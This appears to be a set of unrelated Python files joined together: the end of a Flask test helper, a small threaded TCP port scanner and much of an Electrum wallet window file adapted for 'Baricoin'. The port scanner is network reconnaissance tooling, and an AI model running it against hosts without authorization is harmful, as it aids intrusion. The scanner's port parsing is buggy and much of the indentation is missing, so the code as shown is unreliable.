(https://werkzeug.palletsprojects.com/en/0.15.x/test/#testing-api).
"""
with self.app.test_client() as client:
with client.session_transaction() as session:
session["user_id"] = user.id if user else None
session["fresh"] = True
response = client.open(path, base_url=self.base_url, **args)
self.html = response.data.decode()
return response
def delete_created_objects(self):
for to_delete in self.created_objects:
db.session.delete(to_delete)
db.session.commit()
|
port_scanner.py
|
#!/usr/bin/env python
import socket #for socket scanning
from threading import Thread #for threading
import subprocess #to run the clean command and system exit
import sys
from datetime import datetime
#from queue import Queue #for threading (using queues)
import argparse #used for allowing command line switches
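#Example invocation (illustrative host/ports):
#   python port_scanner.py -H 192.168.1.10 -p 20-1024
#   python port_scanner.py -H 192.168.1.10 -p 22 80 443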
def main():
#Available command line options
parser = argparse.ArgumentParser(description='Allow command line arguments.')
parser.add_argument('-H',metavar='H', nargs="+", help="Target host to scan")
parser.add_argument('-p',metavar="p", nargs="+", help="List of Ports to Scan")
    #assign all available arguments to the 'args' variable
args = parser.parse_args()
#check what time the scan started
t1=datetime.now()
scanports = []
#parse the arguments for the ports and assign port numbers to be scanned
if "-" in args.p[0]:
temp = []
temp = args.p[0].replace('-',' ').split(' ')
temp[-1] = int(temp[-1])
for portnumber in range(1,temp[-1]):
scanports.append(portnumber);
elif len(args.p) > 1:
for portnumber in args.p:
scanports.append(portnumber);
else:
scanports = args.p
#assign the variables
    for host in args.H:
        #remoteServer = host
        #remoteServerIP = socket.gethostbyname(remoteServer)
        #print a banner with info on which host we are about to scan
        print("-" * 60)
        print("Please wait, scanning remote host", host)
        string = "Scanning Ports "
        for portInput in args.p:
            string += portInput + " "
        print(string)
        print("-" * 60)
        #threaded port scanning
        scan(host, scanports)
    #Checking the time again
    t2 = datetime.now()
    #Calculate the time difference to see how long it took to run the scan
    total = t2 - t1
    #print information to screen
    print("Scanning Completed in: ", total)
def scan(host, ports):
    #Spawn one thread per requested port and wait for all of them to finish
    #so that the elapsed-time report above is accurate
    threads = []
    for port in ports:
        t = Thread(target=worker, args=(host, port))
        threads.append(t)
        t.start()
    for t in threads:
        t.join()
def worker(remoteServerIP, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        result = sock.connect_ex((remoteServerIP, port))
        if result == 0:
            print("Port {}: \t Open".format(port))
        sock.close()
    except KeyboardInterrupt:
        print("Canceled the scan.")
        sys.exit()
    except socket.gaierror:
        print("Hostname could not be resolved. Exiting.")
        sys.exit()
    except socket.error:
        print("Could not connect to server")
        sys.exit()
if __name__ == "__main__":
subprocess.call('clear', shell=True) #clear the screen
main() #execute main code
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Baricoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME,
InvoiceError)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
from .qrreader import scan_qrcode
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
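# Usage sketch (illustrative; `do_sign` is a hypothetical method name):
#
#   @protected
#   def do_sign(self, tx, password):
#       ...  # e.g. self.wallet.sign_transaction(tx, password)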
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True  # setDaemon() is deprecated; a daemon thread won't block shutdown
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once the GUI has been initialized, check whether anything needs to be
# announced, since callbacks may have fired before the GUI was ready.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
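# "winpos-qt" may be missing or may refer to a screen that is no longer
# attached; validate it against the current geometry and fall back to a
# default size below.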
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum"
if constants.net.TESTNET:
name += " " + constants.net.NET_NAME.capitalize()
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Baricoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Baricoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Baricoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)  # sanity check: discard the list if its entries are not comparable
except Exception:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
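# Use a factory so each menu action captures its own path; a lambda defined
# directly in the loop would late-bind `k` to the last filename.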
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
# add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
if self.network and self.network.local_watchtower:
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://github.com/asuka431/baricoin"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('baricoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Baricoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Baricoin system.") + "\n\n" +
